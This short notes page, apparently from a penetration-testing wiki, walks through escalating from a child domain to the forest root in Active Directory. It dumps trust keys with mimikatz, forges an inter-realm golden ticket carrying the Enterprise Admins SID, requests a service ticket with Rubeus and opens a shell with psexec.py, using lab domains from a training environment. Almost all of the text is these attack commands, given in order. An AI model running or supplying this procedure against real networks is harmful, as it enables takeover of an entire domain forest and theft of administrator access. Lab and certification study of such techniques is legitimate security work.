Last updated 5 months ago
Was this helpful?
For long version refer this article Refer Trusted- Vulnlab for example To get Domain SID:
lsadump::trust /patch
Then
Use the SID and rc4 hash:
Kerberos::golden /user: Administrator /domain: dollarcorp.moneycorp.local [child_domain] /sid: DomainAdmin_SID [-512] /sids: Enterprise_Admin_SID [519] /rc4: Ticket HASH /service:krbtgt /target:moneycorp.local [root domain] /ticket: location to save the ticket
Now use Rubeus to get TGS:
Rubeus.exe asktgs /ticket: ticket Location /service: service type [cifs/mcorpdc.moneycorp.local] /dc: domain controller [mcorp-dc.moneycorp.local] /ptt
Then to get shell:
psexec.py administrator@trusteddc.trusted.vl -k -no-pass
